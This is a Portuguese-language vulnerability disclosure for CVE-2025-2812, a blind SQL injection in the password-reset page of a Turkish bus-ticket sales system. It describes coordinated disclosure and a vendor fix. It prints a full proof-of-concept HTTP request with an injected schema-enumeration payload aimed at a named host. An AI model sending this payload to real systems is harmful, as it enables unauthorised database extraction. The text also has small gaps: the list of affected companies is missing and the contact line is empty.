
CVE-2025-2812 Injeção SQL
📌 CVE-ID: CVE-2025-2812
📢 Aviso USOM: tr-25-0099
🛡️ Tipo de Vulnerabilidade: CWE-89 - SQL Injection (Boolean-based Blind)
🏢 Produto Afetado: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 Exemplo de URL de Destino:https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
No produto "Bilet Satış Otomasyonu", foi detectada uma vulnerabilidade de Boolean-based Blind SQL Injection no parâmetro "Primeira letra do seu nome" (ilkHarf) da página de redefinição de senha (SifremiUnuttum.php). Esta vulnerabilidade permite a extração de dados do sistema sem nome de usuário ou senha.
Esta vulnerabilidade afeta os sistemas das seguintes empresas de ônibus:
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW
ilkHarfApós a vulnerabilidade que detectamos no produto "Bilet Satış Otomasyonu", desenvolvido pela "Mydata Bilişim Ltd. Şti", esta falha, divulgada com o código CVE-2025-2812, foi anunciada em coordenação com o fabricante e o USOM. Temos orgulho de contribuir com a comunidade de segurança cibernética neste processo.
Após a notificação da vulnerabilidade, a Mydata Bilişim Ltd. Şti implementou rapidamente todos os procedimentos necessários, corrigindo a falha de segurança relevante e integrando medidas de segurança adicionais aos seus sistemas. Agradecemos pela transparência, colaboração e senso de responsabilidade demonstrados ao longo do processo.
Temos orgulho de contribuir com a comunidade de segurança cibernética neste processo.
Você pode entrar em contato comigo para qualquer pergunta, feedback ou colaboração: